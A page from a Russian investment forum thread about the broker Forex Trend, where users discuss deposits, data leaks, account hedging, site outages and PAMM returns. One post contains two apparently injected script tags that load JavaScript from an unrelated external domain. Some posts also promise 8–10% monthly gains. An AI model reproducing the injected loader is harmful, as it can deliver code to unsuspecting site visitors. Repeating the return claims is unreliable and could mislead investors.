• Добро пожаловать на инвестиционный форум!

Во всем многообразии инвестиций трудно разобраться. MMGP станет вашим надежным помощником и путеводителем в мире инвестиций. Только самые последние тренды, передовые технологии и новые возможности. 400 тысяч пользователей уже выбрали нас. Самые актуальные новости, проверенные стратегии и способы заработка. Сюда люди приходят поделиться своим опытом, найти и обсудить новые перспективы. 16 миллионов сообщений, оставленных нашими пользователями, содержат их бесценный опыт и знания. Присоединяйтесь и вы!

Впрочем, для начала надо зарегистрироваться!
  • 🐑 Моисей водил бесплатно. А мы платим, хотя тоже планируем работать 40 лет! Принимай участие в партнеской программе MMGP
  • 📝 Знаешь буквы и умеешь их компоновать? Платим. Дорого. Бессрочная акция от MMGP: "ОПЛАТА ЗА СООБЩЕНИЯ"

Forex Trend - fx-trend.com - Страница 263

Mironchik

Интересующийся
Реакции
21
Поинты
0.000
А что вдруг стало с вводом средств с карт сбербанка через иксчендж? Кто нибудь знает?

Vitaly550

Специалист
Реакции
197
Поинты
0.000
Народ,подскажите, кому после регистраций в компаний forex-trend начали названивать на мобильный со скрытых номеров, сотрудники других подобных компаний с предложением вложить деньги в торговлю на фондовых рынках,форексе, а также положить деньги на доверенное управление. Зарегистрировался я в forex-trende в конце прошлой недели. И уже сегодня несколько раз мне звонили с такими предложениями. Почему я уверен что мой телефон попал от них:1.Все кто звонят предлагают услуги наподобие таких как в fx-trend. 2. Звонившие мне сотрудники знают что я интересуюсь памм-инвестициями, хотя данную информацию не знает никто ни в моем окружениями, и темболее другие сайты на котрых я зарегестрирован.
Очень жаль что моё знакомство с компанией началось с такого!
регистрировался в форекстренде весной 2013 - на следующий день пришло сообщение на мобильный с чем-то там от ммм - номер у меня с 2006 года, известен многим, и светился в разных местах, но совпадение какой-то осадок в глубине души оставило...

Den2000

МАСТЕР
Верифицирован
Реакции
2,343
Поинты
0.000
А что вдруг стало с вводом средств с карт сбербанка через иксчендж? Кто нибудь знает?
У них постоянно что-то меняется. Какие-то банки отключают, потом подключают вновь. Вероятно что-то подобное и в этот раз.
Но вообще с такими вопросами Вам лучше спросить в ветке самого обменника

xag197911

ТОП-МАСТЕР
Верифицирован
Реакции
3,291
Поинты
0.310
регистрировался в форекстренде весной 2013 - на следующий день пришло сообщение на мобильный с чем-то там от ммм - номер у меня с 2006 года, известен многим, и светился в разных местах, но совпадение какой-то осадок в глубине души оставило...

Давно так не ржал :lol: ФТ не сливает данные никому. Им это не выгодно.
А вообще ФТ сами делают прозвон. Но делают только по своей базе зарегистрированных. Кто зарегистрировался и не вложился или не завершил регистрацию.
Моему рефу недавно звонили. Звонила девочка какая то, приставилась Юлией. Спросила о возникших проблемах с регистрацией и уточнила, может ли она помочь их решить. Еще сказал, что номер с которого она звонила бесплатен, и на него можно звонить. Правда на сайте он не висит.
Видать после критики на форуме решили всерьез улучшить качество техподдерки.

Максимм

МАСТЕР
Реакции
1,130
Поинты
0.000

id-reznik

Специалист
Верифицирован
Реакции
2,659
Поинты
0.000
. Fx-trend, я так понимаю, лот 0.01 крутит у себя? То есть на вывод идет лот от 0.1?
Мини счета не перекрываются, как мне известно. Перекрывается ECN счет.
Есть еще глобальный вопрос качества исполнения и объема ликвидности в ECN. Подозреваю, даже для брокеров входящих в одну ECN условия могут разниться, но это уже магия дилинга и договорные отношения, недоступные для простых смертных.

Роскошный Джорж

Интересующийся
Реакции
0
Поинты
0.000
Скажите пожалуйста, почему нельзя торговать на FOREX если я являюсь временным резидентом США?
Спасибо

Станис

Интересующийся
Реакции
8
Поинты
0.000
Скажите пожалуйста, почему нельзя торговать на FOREX если я являюсь временным резидентом США?
Спасибо

Про закон Додда-Франка слышали, принятый Обамой в 10 году? Он запрещает гражданам и компаниям проведение большинства операций на внебиржевом рынке ( в т.ч. форекс).

fxlionpromo

ТОП-МАСТЕР
Реакции
3,194
Поинты
1.130
Про закон Додда-Франка слышали, принятый Обамой в 10 году? Он запрещает гражданам и компаниям проведение большинства операций на внебиржевом рынке ( в т.ч. форекс).
за пределами своей страны
поэтому американцы только внутри своей страны торгуют, грубо говоря закон для того, чтобы деньги оставались в стране
а так в сша много форекс-компаний, торгуйте там на здоровье

venetonn

Профессионал
Реакции
268
Поинты
0.000
Мини счета не перекрываются, как мне известно.
Насколько мне известно, то мини счета тоже перекрываются (говорили в киевском офисе), только в том случае, когда суммарный обьем по сделкам становит минимум 0,1 лота. Насколько я понял, сделки менее 0,1 лота обслуживает сама компания.

Shalom

МАСТЕР
Реакции
1,857
Поинты
28.720
Насколько мне известно, то мини счета тоже перекрываются (говорили в киевском офисе), только в том случае, когда суммарный обьем по сделкам становит минимум 0,1 лота. Насколько я понял, сделки менее 0,1 лота обслуживает сама компания.

Возможно и большая лотность крутится внутри, просто компания может выводить суммарную позицию в которую влиты позиции по сотням трейдерам.

Ну типа такого варианта. 200 трейдеров продали евро, суммарная позиция 30 лотов, в это время 100 трейдеров купили евро, на 20 лотов. В итоге компания просто выведет продажу в 10 лотов на рынок.

wawawa

Интересующийся
Реакции
13
Поинты
0.000
Что с сайтом?
_http://ping-admin.ru/free_test/result/1392222478257d70k30hrxus9981r4y.html
upd: все, починили
<script src="//zycker.com/static/no-conflict.js"></script>
<script src="//zycker.com/static/no-conflict.js"></script>

Последнее редактирование:

kolomatic

МАСТЕР
Реакции
1,116
Поинты
0.000
Мне кажется, все идет на поставщиков любыми объемами. Зачем компании заморачиваться с этими копейками, обслуживать этот процесс, если поставщики давно работают с объемами 0.01. Иначе, была бы заметная разница в исполнении на мини и есн-счете. Пару лет назад, когда я переходил от мини к обычному, я не заметил никакой разницы. Хотя все это досужие домыслы, одному богу известно как там все варится на самом деле.

ddmaster

ТОП-МАСТЕР
Реакции
8,513
Поинты
0.000
Это было временно, у меня уже загрузился сайт.

Реакции
7
Поинты
0.000
Захожу в Пантеон, мои памм-счета, кликаю на любой, перехожу не в статистику счета а на страницу списка счетов.

Вообще, никто не заметил, что оба сайта работают очень медленно, отклик очень долгий? Нажал, ждешь пока обновиться. Конечно, же это скорее всего совпадение. Но для компаний, в которые вложено такое количество средств инвесторов, это просто непозволительно. Я не удивляюсь, когда захожу на сайт почты РФ и он не работает, но сюда же люди вложили средства и начинают переживать, когда такое происходит. "Извините, у нас были технические проблемы" - я считаю это вообще не должно катить с компанией такого масштаба.

добавлено через 7 минут
UPD: ссылки на памм-счета, в которые вложены средства оживли в ту же минуту что и сайт Forex Trend.

Последнее редактирование:

aspiez

ТОП-МАСТЕР
Реакции
3,339
Поинты
23.580
но сюда же люди вложили средства и начинают переживать, когда такое происходит.
А Вы за всех не говорите. Если Вы начинаете переживать из-за 2-ух минутного отсутствия сайта, то это не значит, что все так же переживают. Это интернет.

Реакции
7
Поинты
0.000
А Вы за всех не говорите. Если Вы начинаете переживать из-за 2-ух минутного отсутствия сайта, то это не значит, что все так же переживают. Это интернет.

А где Вы увидели, что я говорю за всех? Исключительно, за себя.
И больше смущает не недоступность ресурса в течении 15-20 минут, а сумма факторов, которая накладывает не очень приятное впечатление на компанию (хорошо, если ошибочно). В моем случае это сумма факторов:

а) медленная работа сайта, недоступность сайта (хотя такое вижу впервые).
б) куча грамматических ошибок на официальном форуме от представителей компании (ну это ведь элементарно, публикуете акцию, которую прочитает 1000 человек, загоните в ворд, поправьте ошибки, расставьте пробелы и т.д.)

в) уровень ответов техподдержки, несоблюдение элементарных правил делового общения, скорость обработки обращений.

Gambit7

Специалист
Реакции
148
Поинты
0.000
На данный момент помимо того что залил в ПАММы, оставил 5000 баксов в банке, теперь думаю вывести деньги из банка и залить их под акцию "Стабильный курс", уж очень эта акция манит =) Получается довольно хорошая прибыль, вывожу по курсу 8,6 получается примерно 43000 грн, затем заливаю эти деньги по курсу 8, и получается уже 5375 баксов, плюс к этому 6 % акции "лояльности" и плюс планирую порядка 8-10 % зарабатывать в месяц от вложений в ПАММы, по моему довольно хороший вариант выходит:))

Сверху Снизу